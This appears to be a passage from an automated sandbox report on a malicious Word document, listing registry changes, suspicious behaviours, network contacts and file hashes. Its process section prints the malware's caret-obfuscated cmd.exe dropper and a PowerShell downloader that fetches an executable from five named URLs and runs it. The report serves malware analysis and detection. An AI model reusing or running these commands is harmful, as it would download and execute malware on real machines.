| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\cmd.exe
cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ ^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.fairfundskenya.com | udp |
| US | 8.8.8.8:53 | www.trainifique.ro | udp |
| US | 185.199.111.153:80 | www.trainifique.ro | tcp |
| US | 8.8.8.8:53 | trainifique.ro | udp |
| US | 185.199.110.153:443 | trainifique.ro | tcp |
| US | 185.199.110.153:443 | trainifique.ro | tcp |
| US | 8.8.8.8:53 | www.photostand.de | udp |
| DE | 81.169.145.165:80 | www.photostand.de | tcp |
| DE | 81.169.145.165:443 | www.photostand.de | tcp |
| DE | 81.169.145.165:443 | www.photostand.de | tcp |
| US | 8.8.8.8:53 | abdullahsheikh.info | udp |
| US | 8.8.8.8:53 | lamsanviet.com | udp |
| IN | 193.203.163.237:80 | lamsanviet.com | tcp |
| IN | 193.203.163.237:443 | lamsanviet.com | tcp |
| IN | 193.203.163.237:443 | lamsanviet.com | tcp |
Files
memory/2852-0-0x000000002FF41000-0x000000002FF42000-memory.dmp
memory/2852-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2852-2-0x000000007126D000-0x0000000071278000-memory.dmp
memory/2852-7-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-19-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-18-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-124-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-112-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-100-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-87-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-75-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-62-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-31-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-27-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-17-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-15-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-14-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-13-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-12-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-11-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-10-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-9-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-6-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-131-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-59-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-51-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-16-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-8-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-139-0x000000007126D000-0x0000000071278000-memory.dmp
memory/2852-140-0x00000000007E0000-0x00000000008E0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | f12a471b7b2639f1e13bc02a74e8c0ac |
| SHA1 | ec0fbd1646708eb37027cdf4fa6dc04143f4a6e0 |
| SHA256 | 90766f139ea4a8e9d5cdd7f9dd028eb7cf88cb8fb755f5e6da57dd06281c1380 |
| SHA512 | d7c98e22377ab96be371f5a162c2ab35afc153f3651b8534c1f618b9bcbdcb7e7da0cce94545f8262d68ab70c163769ec2d6ff69ffd7585da1655944c876e901 |
memory/2852-156-0x000000007126D000-0x0000000071278000-memory.dmp